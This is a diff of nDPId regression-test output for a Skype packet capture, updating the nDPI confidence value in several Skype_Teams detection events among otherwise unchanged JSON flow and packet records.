00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1214,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -728,10 +728,10 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABARUhAAEAGeZjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8xegAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1431970682972,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970682972,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2ToQAAEARSoLAqAEinTeCrzLdnEYAIsBye70C0WV2Jw2JJv9T381tb7aFs7ugTny6Jk4="} 
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1431970682972,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970682972,"pkt":"0NQSxnP1PBXCt3IOCABFAABBmw8AAEARYEjAqAEib91NrTLdnEwALft7e78CS2barOC4bSdle3ySCU4isieKFyYrhir3D1S\/zus1mmpuRQ=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":1431970683043,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683043,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIpxVyEzh8Ob8VQdrFqASOJAqmgAAAgQFrAQCCApMYN9LPjJCqwEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":3,"flow_last_seen":1431970683044,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JNdAAEAGy1jAqAEinTfrkshMnFVVB2sW4fDm\/YAQECyBfAAAAQEICj4yQvNMYN9L"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1431970683053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxayE3JOyrZSZGeOqASOJDTSQAAAgQFrAQCCApMXOO6PjJCqwEDAwk="} 
@@ -741,13 +741,13 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1431970683978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970683978,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGihAAEAGpLjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8tkQAAAgQFtAEDAwUBAQgKPjJGlAAAAAAEAgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1431970683987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683987,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8i9IAAEARpC3AqAEinTfrrzLdnFcAKG0ve8ECvWqBesxtVN\/+FF8A8FJFXO0bTxFAGhtLbx9IUYU="} 
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1431970683987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683987,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Ni4AAEARsXfAqAEinTg0ETLdnE0AIDQfe8MCmFcjIzVltOuGOdvvgZmibnosxcEh"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1248,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1248,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1431970683987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683987,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PqwAAEARIpXAqAEiQAQXqjLdnEsAIM3ke8UC93ejJq9SbNcOBlZBFwBC35pf1nt9"} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":3,"flow_last_seen":1431970684268,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684268,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+Rv3UowwKgBIpxIyE81se9IYPNDQ6ASOJCdPQAAAgQFrAQCCApNifogPjJCqwEDAwk="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJbZAAEAGym3AqAEinTfrkshQAbtIMwlhAAAAALAC\/\/9JqAAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} 
@@ -767,26 +767,26 @@ 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1431970684880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970684880,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo55hAAEAG11\/AqAEib91KMMhTAbtJAhNsAAAAAFAEAAANjAAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1431970684997,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970684997,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyBX4AAEARk57AqAEinTeCnTLdnE0AHhvPe8cCM2e01AKVV7JkJRCi7OoE7P+SqQ=="} 
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1287,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1287,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1431970684997,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684997,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8MWwAAEARL9zAqAEiQAQXmzLdnEQAKCm\/e8kCIw7UNc1vAeAYbNVJreKXHNKN8e8UIdCt8moAbvU="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1287,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1287,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1288,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1288,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1431970684997,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970684997,"pkt":"0NQSxnP1PBXCt3IOCABFAABBr7UAAEARf9fAqAEi1cezjTLdnE8ALaWJe8sCd26eaxqppENRG4WXSuPXFKjQruFJphoXGEqS7tX7w9Yk1Q=="} -00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1288,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1288,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1316,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1431970685835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431970685835,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChckEAAAERlUbAqAEi7\/\/\/+udlB2wAjUvnTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} 
